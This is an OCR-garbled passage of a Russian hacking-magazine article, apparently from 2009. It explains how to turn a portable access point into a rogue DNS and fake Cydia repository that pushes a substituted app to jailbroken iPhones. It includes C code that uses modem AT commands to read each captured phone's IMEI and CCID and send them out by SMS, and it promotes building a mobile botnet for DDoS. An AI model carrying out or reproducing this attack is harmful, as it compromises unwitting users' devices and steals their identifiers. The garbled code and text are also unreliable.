разрешаем рекурсивные запросы 
20пе_бгапзіег_ас1 = "127.0.0.1/8, 

10.0.0.0/24" / /разрешаем пересылку зон 
ЦішеоиР_зесопбз = 2 
сзѵі = { } 

сзѵі [ "гірбеѵ. сот. " ] = " гірбеѵ . сот" 
бпз_рогб =53 

тахітит_саске_е1етепРз = 1024 
тіп_ЬШ_спате = 9 00 

/ебс/тагабпз/гірбеѵ. сот: 




> СІѴСІ 



На дискеты найдешь 
исходники програм- 
мы для отправки 5М5. 
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взлом 



» 



# ЗОА 

Згірсіеѵ. сот. | 86400 I % I гоо-Ь@% I 200903211634 | 7200 I 3600 I 
60480011800 

# N3 

? №г ірсіеѵ . с ош . I 86400 I пз . гірсіеѵ. сот. 

# А 

Аі . гірсіеѵ. сот. 186400110.0.0.1 

Теперь все запросы ксерверу будут обработаны терминатором. 

Остается настроить встроенный веб-сервер в качестве поддельного 
репозитория. Поумолчанию веб-сервер запускается с корнем /ѵѵѵѵѵѵ, 
ноты в любой моментможешь погаситьего и запустить с ключом -И/ 
ту/ѵѵѵѵѵѵ-гооТ Выгодно создавать корень веб-сервера на прикручен- 
ной флешке. Так или иначе, нам надо скачать и записать на термина- 
тора следующие файлы: 

ТЩЦр : / / і . гірсіеѵ. сот/ іпіо/іпсіех- 2 . 0 .рІізЦ 
ТЩЦр : / / і . гірсіеѵ. сот/ іпіо/іпсіех-2 . 1 .рІізЦ 
ТЩЦр : / / і . гірсіеѵ. сош/іпіо/іпсіех-2 . 2 .рІізЦ 

В каждом из них исправляем раздел, относящийся к программе Іпзіаііег, 
меняем ключи баФ и ѵегзіоп на большие. Если мы нехотим вызыватьлиш- 
них подозрений, исправляем ссылки на файлы всех остальных программтак, 
чтобы они вели на настоящий сервер. Для этого указываем явно его ІР-адрес. 
Более подробно процесс рассмотрен в уже упомянутой статье «Я блочное 
пюре» в мартовском номере тг . Затем скачиваем и правим следующие файлы: 

ТЩЦр : / / і . гірсіеѵ. сош/іпіо/сош. гірсіеѵ. іпзЦа11-4 . 1- 

2.0. рІізЦ 

ТЩЦр : / /і . гірсіеѵ. сот/ іпіо/сот. гірсіеѵ. іпзСаІІ-4 . 1- 

2.1. рІізЦ 

ТЩЦр : / / і . гірсіеѵ. сот/ іпіо/ сот. гірсіеѵ. іпзЦа11-4 . 1- 

2.2. рІізЦ 

Меняем ключ ѵегзіоп на такой же, какой поставили в предыдущих 
конфигах. Затем редактируем ключи зіге и ЬазЬ. Это размер и тб5 хеш 
от файла с нашим поддельным приложением, которое пользователи 
будут себе устанавливать. Остается только разместить само поддельное 
приложение на роутере вместе с конфигами (то есть создать директорию 
/ѵѵѵѵѵѵ/іпію и /ѵѵѵѵѵѵ/раскадез/ЗѵзІепп ). ну и записать туда все вышеопи- 
санные файлы. 

Н БОНУС. КОДИМ ПОД ІРНОЫЕ 

Какбудем проверять работоспособность нашего терминатора? А пусть 
сами жертвы известят нас с помощью зтз (заодно — получим теле- 
фонный номер отправителя). Достаточное доказательство? Напишем 
приложение и повесим его демоном на захваченные іРЬопе. Забудь про 
хсобе и Арріе 5БК, пользоваться будем грубым мужским дсс. Компилятор 
можно поставить прямо нателефон через Субіа. Или на компьютер: 

I ТЩЦр : //сосіе . доодіе . сот/р/ ірТюпе-сіеѵ/’мікі/ВиіІсііпд 
I ТЩЦр : / /сосіе . доодіе . сот/р/тоіпсЪ.аіп/ 

Отправлять 5М5 будем через АТ команды устройству /беѵ/Ну.беЬид. 

Эта консоль модема используется для отладки и присутствует на всех 
іРЬопе/іРЬопе Зд. Ни одно приложение поумолчанию не использует это 
устройство —то, что доктор прописал! Великий и могучий собе.доодіе. 

уже имеет проекте нужным нам функционалом. Велосипед изобре- 
тать не будем и некоторые функции просто позаимствуем оттуда: 

ТЩЦр : / /сосіе . доодіе . сот/р/ іріюпе- зтз 

Из этого проекта мы возьмем функцию ІпТСопп — подключение к 
модему, СІозеСопп — отключение от модема, ЭепбСтб — отправка АТ ко- 
манды модему и РеабРезр — чтение ответа от модема. Приведу пример 




значимых строк кода (сам проект можно найти на нашем 0Ѵ0): 

іпЦ ІпіЦСопп(іпЦ зреесі) 

{ 

іпЦ Тсі = ореп ( " /сіеѵ/ЦЦу . сіеЬид" , 0_ВБШК | 0_ШСТТУ) ; 
іі(Ш == -1) { 

іргіпЦі ( зСсіегг , "%і(%з)\п", еггпо, зСгеггог (еггпо) ) ; 
ехіЦ ( 1 ) ; 

} 

іосШ ( ісЦ ТІОСЕХСЬ); 

ІепЫіЫ, Р_5ЕТРЬ, 0); 

геСигп Ц'З; 

} 

ѵоіеі СІозеСопп ( іпЦ ісі) 

{ 

Цссігаіп ( ісі) ; 

ЦсзеЦаЦЦг ( ісі, ТСЗАЫОМ, &д0гідіпаІТТУАЦЦгз) ; 
сіозе ( ісі) ; 

} 

ѵоіеі ЗепсіСшсі ( іпЦ ісі, ѵоіеі *Ьиі, зІ 2 е_Ц зІ 2 е) 

{ 



іі (ѵ^гіЦе ( ісі, Ьиі, зіге) == -1) { 
іргіпЦі ( зЦсіегг , " ЗепсіСшсі еггог . %з\п" , 
зЦгеггог (еггпо) ) ; 
ехіЦ (1) ; 

} 

} 

Подумаем над содержанием сообщения. Предлагаю для однозначности 
скидывать с захваченных телефонов ни много, ни мало — аІМЕІиССЮ. 
Это сделает наши доказательства успешной атаки более весомыми. 
Получать данные мы тоже будем через АТ команды. Функцию РеабРезр я 
немного допишу, чтобы находить ответы за запросы ІМЕІ и СОЮ и запи- 
сывать их в переменную теззаде. Выйдет примерно так: 

іі (зЦгзЦг (геасіЬиі, "+СМСМ: " ) !=ШЬЬ) { 

зшзіпсіех = аЦоі (&геасіЬиі [зЦгІеп (теззаде) +10] ) ; 

} 

еізе іі (зЦгзЦг (геасіЬиі , " +ССІБ: " ) ! =ШЬЬ) { 
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Для отладки оборудования, в частности, точек доступа используется разъем ЛАС. Производитель не всегда его распаивает 



зСгпсру (шеззаде , &геасіЬиП [ 17 ] , 20); 

} 

еізе Л (зДгзДг (геайЬиб, "АТ+СОЗТГ ) І=ШЬЬ) { 
ІІСНАК Сешр [15] ; 

зСгпсру (Сешр, &геас!ЪиТ [10] , 15); 
зргіпСІ (шеззаде , " %з-%з " ,шеззаде , Сегпр) ; 

} 

Осталось лишь написать таіп функцию, в которую мы 
заложим весьфункционал. Сначала получаем ССЮ, потом 
— ІМЕІ, затем отправляем сообщение. 

Я пытался сделать код как можно понятнее, а не наиболее 
коротким или красивым. Во всяком случае, он работает, а 
оптимизировать будем потом. Собранный вариантвышел 14 
Кб — немало, но этого вполне хватит, чтобы быстро залить 
на жертву через 802.1 1д. Опять же, оптимизацией займемся 
в следующей статье. Догадайся, что будет, если попытаться 
выполнить наше творение? Отправка 5М5, да? Нет, — ниче- 
го не будет, ядро телефона просто убьет процесс, не дав ему 
ничего исполнить. Хитрость втом, что телефон выполняет 
только подписанные программы. Разработчики хорошо пос- 
тарались на этот счет. Чтобы код работал, надо подписывать 
его перед исполнением на каждом телефоне с помощью 
программы ІсІісІ. Она устанавливается вместе со всеми не- 
официальными программами из Субіа. Мы рассчитываем, 
что у нашей жертвы такая программа будет (об остальных 
вариантах поговорим в следующей статье). 

Н ВОЙНА ВОЙНОЙ, А ПИТАНИЕ ПО РАСПИСАНИЮ 

Нашемутерминатору не хватаеттолько автономного источ- 
ника питания. Действительно, стационарная точка доступа — 
это хорошо, а мобильная куда лучше. Существуют два способа 
решить проблему: переносной аккумулятор и адаптер питания 
отавтомобильного прикуривателя. Для начала смотрим на 
штатный адаптер питания точки доступа и видим что-нибудь 
похожее на 12 В, 1 А. Автомобильный прикуриватель даст 
как раз 12 В, но мгновенные значения за счет шумов могут 
колебаться от8 от 1 6 вольт. Перебои в работе нам не нужны, 
поэтому стоит воспользоваться адаптером с шумоподавите- 
лем. Схема такого устройства нашлась быстро: 

гіостап. ги/зЬет/зсЬешаСісз .ІШт1?с1і = 33 999 



Если не заморачиваться и подключать терминатора после 
зажигания, то можно рискнуть — напрямую подключиться 
к прикуривателю. Также дешево и сердито — воспользо- 
ваться адаптером от ОРЭ-навигатора, он как раз будет 1 2 
В, 1 А и с шумами как-нибудь справится. Еще есть вариант 
установить автомобильный адаптер инвертер 1 2/220 В 
(можно брать от 50 В мощности). Что касается перенос- 
ных аккумуляторов, то подключаться стоит к обычному 
ноутбучному. Подсчитаем: аккумулятор для ноутбука при 
12 В дает4.8 А/ч —то есть, почти пять часов работы при 
потреблении в 1 А. Отмечу, что это пиковый ток, потребля- 
емый точкой. Среднее значение будет меньше, — азначит, 
время работы заведомо больше 5 часов. С аккумулятора 
надо будетснимать только + и -, логические контакты 
оставь в покое. Узнать распайку контактов можно либо по 
наклейке на аккумуляторе, либо с помощьютестера. На- 
деюсь, приведенной здесь информации будет достаточно, 
чтобы запитатьтерминатора. 

Н НЕДАЛЕКОЕ БУДУЩЕЕ 

В последнее время производительность и скорость 
подключения к интернету мобильных устройств сильно 
растут. В недалеком будущем, а вернее, уже почти 
настоящем, вырисовываются четкие перспективы мо- 
бильных ботнетов. Эти устройства практически всегда 
онлайн, имеют несколько способов подключения к 
Сети, при этом — есть ОРЭ-навигация. Они всегда нахо- 
дятся рядом со своими владельцами и часто содержат 
конфиденциальную инфу. Я думаю, причин для хака 
более чем достаточно! Сегодня я попытался рассказать, 
как без особых усилий сделать устройство, способное 
получать доступ к Ар р Іе іРЬопе в автоматическом ре- 
жиме. Перемещаясь с таким терминатором поулицам, 
можно собрать целую мобильную армию, готовую в лю- 
бой момент произвести ЭВоЗ-атаку или распределено 
вычислить значение хеш -функции. В следующей статье 
я опишу процесс создания трояна дл я іРЬопе. Он спо- 
собен получать команды с сервера хозяина, отправлять 
различными способами данные стелефона, выполнять 
шелл-команды, собирать статистику, генерировать 
трафик на определенный ресурс и... что-нибудь еще, 
что успею придумать, □с 




> ІП^О 

•Точка доступа 
обладает рядом 
преимуществ перед 
ноутбуком, напри- 
мер: размеры, вес, 
энергопотребление, 
стоимость, разъем 
внешней антенны. 

• В мартовском 
номереіз-сза 2009 
год были описаны 
эксплуатируемые 
атаки. Если оста- 
лись вопросы — пе- 
речитай подшивку. 
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